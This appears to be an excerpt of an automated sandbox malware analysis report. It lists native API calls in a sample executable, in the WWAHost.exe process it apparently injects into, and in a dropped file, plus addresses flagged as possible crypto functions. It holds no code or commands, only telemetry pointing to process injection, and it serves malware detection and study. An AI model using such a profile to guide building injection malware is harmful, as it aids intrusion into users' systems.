Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_00416BBA NtCreateFile, | 1_2_00416BBA
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_00416CEA NtClose, | 1_2_00416CEA
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_00416D9B NtAllocateVirtualMemory, | 1_2_00416D9B
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFA6A0 NtCreateSection,LdrInitializeThunk, | 1_2_06DFA6A0
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFA610 NtAdjustPrivilegesToken,LdrInitializeThunk, | 1_2_06DFA610
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFA750 NtCreateFile,LdrInitializeThunk, | 1_2_06DFA750
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFA700 NtProtectVirtualMemory,LdrInitializeThunk, | 1_2_06DFA700
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFA720 NtResumeThread,LdrInitializeThunk, | 1_2_06DFA720
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFA480 NtMapViewOfSection,LdrInitializeThunk, | 1_2_06DFA480
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFA4A0 NtUnmapViewOfSection,LdrInitializeThunk, | 1_2_06DFA4A0
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFA410 NtQueryInformationToken,LdrInitializeThunk, | 1_2_06DFA410
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFA5F0 NtReadVirtualMemory,LdrInitializeThunk, | 1_2_06DFA5F0
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFA540 NtDelayExecution,LdrInitializeThunk, | 1_2_06DFA540
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFA560 NtQuerySystemInformation,LdrInitializeThunk, | 1_2_06DFA560
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFA2D0 NtClose,LdrInitializeThunk, | 1_2_06DFA2D0
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFA240 NtReadFile,LdrInitializeThunk, | 1_2_06DFA240
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFA3E0 NtFreeVirtualMemory,LdrInitializeThunk, | 1_2_06DFA3E0
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFA360 NtAllocateVirtualMemory,LdrInitializeThunk, | 1_2_06DFA360
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFA6D0 NtCreateProcessEx, | 1_2_06DFA6D0
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFA650 NtQueueApcThread, | 1_2_06DFA650
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFA780 NtOpenDirectoryObject, | 1_2_06DFA780
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFA710 NtQuerySection, | 1_2_06DFA710
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFACE0 NtCreateMutant, | 1_2_06DFACE0
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFA470 NtSetInformationFile, | 1_2_06DFA470
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFB470 NtOpenThread, | 1_2_06DFB470
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFA460 NtOpenProcess, | 1_2_06DFA460
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFB410 NtOpenProcessToken, | 1_2_06DFB410
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFA430 NtQueryVirtualMemory, | 1_2_06DFA430
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFA5A0 NtWriteVirtualMemory, | 1_2_06DFA5A0
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFBD40 NtSuspendThread, | 1_2_06DFBD40
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFA520 NtEnumerateKey, | 1_2_06DFA520
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFA2F0 NtQueryInformationFile, | 1_2_06DFA2F0
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFA260 NtWriteFile, | 1_2_06DFA260
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFBA30 NtSetContextThread, | 1_2_06DFBA30
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFA220 NtWaitForSingleObject, | 1_2_06DFA220
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFA3D0 NtCreateKey, | 1_2_06DFA3D0
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFA350 NtQueryValueKey, | 1_2_06DFA350
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFA370 NtQueryInformationProcess, | 1_2_06DFA370
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFA310 NtEnumerateValueKey, | 1_2_06DFA310
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFB0B0 NtGetContextThread, | 1_2_06DFB0B0
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFA800 NtSetValueKey, | 1_2_06DFA800
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_0342A350 NtQueryValueKey,LdrInitializeThunk, | 3_2_0342A350
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_0342A360 NtAllocateVirtualMemory,LdrInitializeThunk, | 3_2_0342A360
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_0342A310 NtEnumerateValueKey,LdrInitializeThunk, | 3_2_0342A310
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_0342A3D0 NtCreateKey,LdrInitializeThunk, | 3_2_0342A3D0
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_0342A3E0 NtFreeVirtualMemory,LdrInitializeThunk, | 3_2_0342A3E0
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_0342A240 NtReadFile,LdrInitializeThunk, | 3_2_0342A240
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_0342A260 NtWriteFile,LdrInitializeThunk, | 3_2_0342A260
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_0342A2D0 NtClose,LdrInitializeThunk, | 3_2_0342A2D0
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_0342A800 NtSetValueKey,LdrInitializeThunk, | 3_2_0342A800
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_0342A750 NtCreateFile,LdrInitializeThunk, | 3_2_0342A750
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_0342A610 NtAdjustPrivilegesToken,LdrInitializeThunk, | 3_2_0342A610
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_0342A6A0 NtCreateSection,LdrInitializeThunk, | 3_2_0342A6A0
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_0342A540 NtDelayExecution,LdrInitializeThunk, | 3_2_0342A540
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A560 NtQuerySystemInformation,LdrInitializeThunk,3_2_0342A560
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A470 NtSetInformationFile,LdrInitializeThunk,3_2_0342A470
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A410 NtQueryInformationToken,LdrInitializeThunk,3_2_0342A410
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342ACE0 NtCreateMutant,LdrInitializeThunk,3_2_0342ACE0
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A480 NtMapViewOfSection,LdrInitializeThunk,3_2_0342A480
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A370 NtQueryInformationProcess,3_2_0342A370
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A220 NtWaitForSingleObject,3_2_0342A220
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342BA30 NtSetContextThread,3_2_0342BA30
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A2F0 NtQueryInformationFile,3_2_0342A2F0
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342B0B0 NtGetContextThread,3_2_0342B0B0
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A700 NtProtectVirtualMemory,3_2_0342A700
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A710 NtQuerySection,3_2_0342A710
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A720 NtResumeThread,3_2_0342A720
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A780 NtOpenDirectoryObject,3_2_0342A780
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A650 NtQueueApcThread,3_2_0342A650
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A6D0 NtCreateProcessEx,3_2_0342A6D0
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342BD40 NtSuspendThread,3_2_0342BD40
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A520 NtEnumerateKey,3_2_0342A520
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A5F0 NtReadVirtualMemory,3_2_0342A5F0
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A5A0 NtWriteVirtualMemory,3_2_0342A5A0
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A460 NtOpenProcess,3_2_0342A460
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342B470 NtOpenThread,3_2_0342B470
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342B410 NtOpenProcessToken,3_2_0342B410
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A430 NtQueryVirtualMemory,3_2_0342A430
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A4A0 NtUnmapViewOfSection,3_2_0342A4A0
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_003D6BC0 NtCreateFile,3_2_003D6BC0
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_003D6C70 NtReadFile,3_2_003D6C70
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_003D6CF0 NtClose,3_2_003D6CF0
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_003D6DA0 NtAllocateVirtualMemory,3_2_003D6DA0
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_003D6BBA NtCreateFile,3_2_003D6BBA
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_003D6CEA NtClose,3_2_003D6CEA
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_003D6D9B NtAllocateVirtualMemory,3_2_003D6D9B
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 13_2_02AC0B93 NtProtectVirtualMemory,13_2_02AC0B93
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 13_2_02AC0D70 NtResumeThread,13_2_02AC0D70
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 13_2_02AC0D4E NtSetContextThread,13_2_02AC0D4E
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A6A0 NtCreateSection,LdrInitializeThunk,15_2_06E3A6A0
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A610 NtAdjustPrivilegesToken,LdrInitializeThunk,15_2_06E3A610
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A750 NtCreateFile,LdrInitializeThunk,15_2_06E3A750
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A720 NtResumeThread,LdrInitializeThunk,15_2_06E3A720
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A700 NtProtectVirtualMemory,LdrInitializeThunk,15_2_06E3A700
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A4A0 NtUnmapViewOfSection,LdrInitializeThunk,15_2_06E3A4A0
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A480 NtMapViewOfSection,LdrInitializeThunk,15_2_06E3A480
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A410 NtQueryInformationToken,LdrInitializeThunk,15_2_06E3A410
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A5F0 NtReadVirtualMemory,LdrInitializeThunk,15_2_06E3A5F0
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A560 NtQuerySystemInformation,LdrInitializeThunk,15_2_06E3A560
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A540 NtDelayExecution,LdrInitializeThunk,15_2_06E3A540
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A2D0 NtClose,LdrInitializeThunk,15_2_06E3A2D0
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A240 NtReadFile,LdrInitializeThunk,15_2_06E3A240
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A3E0 NtFreeVirtualMemory,LdrInitializeThunk,15_2_06E3A3E0
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A360 NtAllocateVirtualMemory,LdrInitializeThunk,15_2_06E3A360
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A6D0 NtCreateProcessEx,15_2_06E3A6D0
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A650 NtQueueApcThread,15_2_06E3A650
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A780 NtOpenDirectoryObject,15_2_06E3A780
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A710 NtQuerySection,15_2_06E3A710
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3ACE0 NtCreateMutant,15_2_06E3ACE0
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A460 NtOpenProcess,15_2_06E3A460
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3B470 NtOpenThread,15_2_06E3B470
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A470 NtSetInformationFile,15_2_06E3A470
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A430 NtQueryVirtualMemory,15_2_06E3A430
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3B410 NtOpenProcessToken,15_2_06E3B410
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A5A0 NtWriteVirtualMemory,15_2_06E3A5A0
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3BD40 NtSuspendThread,15_2_06E3BD40
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A520 NtEnumerateKey,15_2_06E3A520
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A2F0 NtQueryInformationFile,15_2_06E3A2F0
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A260 NtWriteFile,15_2_06E3A260
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A220 NtWaitForSingleObject,15_2_06E3A220
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3BA30 NtSetContextThread,15_2_06E3BA30
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A3D0 NtCreateKey,15_2_06E3A3D0
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A370 NtQueryInformationProcess,15_2_06E3A370
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A350 NtQueryValueKey,15_2_06E3A350
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A310 NtEnumerateValueKey,15_2_06E3A310
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3B0B0 NtGetContextThread,15_2_06E3B0B0
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A800 NtSetValueKey,15_2_06E3A800
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_005C0B93 NtProtectVirtualMemory,15_2_005C0B93
Detected potential crypto function
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 0_2_00402566
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 0_2_00402538
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_004078F0
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_0041B1CB
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_0041AB60
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_00419D48
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_00419F03
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06E826F8
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06E73E96
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06E7CE66
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DD7640
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DE5E70
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DE4E61
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DE6611
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06E81FCE
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DD5790
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06E72782
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06E81746
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06E744EF
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06E7DCC5
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06E82C9A
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06E81C9F
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06E73490
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DE547E
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06E6F42B
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DD1410
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DC740C
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06E61DE3
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06E7D5D2
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06E6FDDB
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06E7E581
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06E5E58A
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DB0D40
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06E5C53F
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DD1530
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06E82519
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06E71D1B
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06E822DD
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DD42B0
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06E81A99
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DE4A5B
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DE523D
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06E70A02
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06E8E214
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DE63C2
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DBEBE0
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DE4B96
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DDFB40
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06E828E8
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DE48CB
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06E618B6
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DCA080
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DE1070
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DE9810
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06E7D016
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DEE020
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DE0021
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06E819E2
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06E761DF
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06E8D9BE
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DE6180
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DE594B
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DE7110
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06E09906
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_0340FB40
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_034163C2
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_03414B96
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_033EEBE0
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_03414A5B
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_034A0A02
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_034BE214
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_0341523D
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_034B22DD
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_034B1A99
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_034042B0
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_0341594B
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_03439906
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_03417110
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_034A61DF
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_034B19E2
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_03416180
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_034BD9BE
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_03411070
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_03419810
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_034AD016
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_03410021
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_0341E020
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_034148CB
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_034B28E8
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_033FA080
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_034918B6
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_034B1746
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_034B1FCE
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_034A2782
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_03405790
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_03407640
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_03414E61
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_034ACE66
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_03415E70
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_03416611
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_034B26F8
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_034A3E96
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_034A1D1B
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_034B2519
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_03401530
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_0348C53F
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_033E0D40
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_0349FDDB
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_034AD5D2
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_03491DE3
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_0348E58A
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_034AE581
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_033F740C
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_0341547E
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_03401410
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_0349F42B
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_034ADCC5
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_034A44EF
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_034B2C9A
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_034B1C9F
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_034A3490
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_003C78F0
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_003DB1CB
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_003DAB60
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_003D9D48
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_003D9F03
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06EC26F8
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06EB3E96
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06E24E61
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06EBCE66
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06E25E70
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06E17640
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06E26611
